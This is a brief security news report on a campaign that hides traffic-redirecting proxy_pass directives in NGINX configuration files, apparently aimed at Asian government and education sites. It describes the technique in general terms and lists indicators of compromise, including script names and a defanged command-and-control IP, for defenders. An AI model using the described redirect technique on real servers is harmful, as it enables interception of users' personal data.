73/69 Friday, February 6, 2026
Researchers from DataDog Security Labs have discovered a cyberattack campaign targeting NGINX servers, a widely used web traffic management software. Threat actors modify configuration files to secretly install redirect commands, routing user data through hacker-controlled infrastructure before forwarding it to the legitimate destination. The campaign primarily targets websites using Asian top-level domains (TLDs), focusing on government (.gov) and educational (.edu) domains, including those in Thailand (.th), particularly systems running the Baota Control Panel.
The attackers employ highly stealthy techniques, using a toolkit that executes a sequence of steps to inject malicious directives into the “location” blocks of NGINX and abuse the proxy_pass directive-normally intended for load balancing-to reroute traffic. Because this activity resembles legitimate system behavior, many security detection tools may overlook it. Additionally, the attackers preserve original headers, such as user IP addresses and browser types, to avoid raising suspicion while data is transmitted through cybercriminal infrastructure.
What makes this campaign especially concerning is its difficulty to detect. Rather than exploiting a direct software vulnerability, the attackers implant commands within configuration files that administrators often do not routinely review. Users can still access the intended websites normally, leaving them unaware that their personal data may be intercepted. Administrators are advised to immediately inspect directories such as /etc/nginx/sites-enabled, monitor for suspicious script files (for example, zx[.]sh and bt[.]sh), and review unusual outbound connections to 158.94.210[.]227, identified as the attackers’ command-and-control (C2) server.